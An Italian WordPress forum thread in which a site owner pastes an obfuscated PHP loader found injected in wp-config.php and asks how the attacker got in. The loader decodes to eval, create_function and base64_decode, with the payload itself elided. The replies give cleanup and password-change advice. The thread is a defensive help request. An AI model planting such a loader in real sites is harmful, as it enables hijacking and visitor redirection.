Home › Forum › Problemi Vari con WP › Attacco "Local File Include", come risolverlo?
-
AutorePost
-
-
2 Maggio 2014 alle 12:39 #27166ottomasiPartecipante
Ciao,
ieri ho scoperto che alcuni siti (tutti sullo stesso hosting ==> hostgator) che gestisco ogni tanto redirezionavano la gente verso dei siti porno. Ho poi beccato questo codice all’interno (esattamente all’inizio) del file wp-config.php e ho capito.
Qualcuno sa darmi un indicazione su dove poter controllare per capire com’è entrato?
<? php var1= array('1475','1492','1471','1482');
$var2= array('8383','8398','8385','8381','8400','8385','8379','8386','8401','8394','8383','8400','8389','8395','8394');
$var3= array('8799','8798','8816','8802','8755','8753','8796','8801','8802','8800','8812','8801','8802');
$var4="STRINGA-LUNGA"; //stringa molto lunga di caratteri APPARENTEMENTE casuali
if (!function_exists("funz1")){
function funz1($var5,$var6){
$var7 = '';
foreach($var5 as $var8){
$var7 .= chr($var8 - $var6);
}
return $var7;
}
$var9 = funz1(var1,1374);
$var10 = funz1($var2,8284);
$var11 = funz1($var3,8701);
$var12 = $var10('$var13',$var9.'('.$var11.'($var13));');
$var12($var4);
}?>Grazie mille
Stefano
P.S. le variabili sono state modificate per semplificare la lettura (cosa che stavo tentando di fare anche prima se mi fosse stato dato il tempo di editare il post )
P.P.S. sto già cambiando tutte le password e ho tolto tutti quei codici.
-
2 Maggio 2014 alle 13:27 #111174SteveAglAmministratore del forum
Ti è stato detto che hai una versione di WP iperdata quindi con baci conosciuti ma magari è il server compromesso o altro… pulisci il codice e aggiorna.. capire se e da dove richiede accesso al server ai suoi log ed una analisi che può richiedere giorni.. ecco le conseguenze di tenersi siti con wp e plugin e temi non aggiornati.
-
2 Maggio 2014 alle 13:30 #111176ottomasiPartecipante
Chi me l’avrebbe detto?
Nei miei siti aggiorno da sempre tutto entro una settimana dall’uscita degli aggiornamenti stessi
-
2 Maggio 2014 alle 13:47 #111177SteveAglAmministratore del forum
SOrry confuso con altro thread… quindi non è una falla di WP imrimane qualche plugin ma più probabilmente qualche vulnerabilità sul server, che ne so phpmyadmin ma anche linux stesso se hanno avuto accesso in scrittura al filesystem. Direi che aprire un ticket col fornitore è essenziale, cambiare password di accesso (spero non usi admin come utente nel caso cambiarlo) cambiare password FTP etc è di certo il primo passo e se hai altri utenti obbligarli al cambio password pure loro.
-
2 Maggio 2014 alle 14:17 #111178ottomasiPartecipante
ok grazie mille! Ti farò sapere.
-
-
AutorePost
- Devi essere connesso per rispondere a questo topic.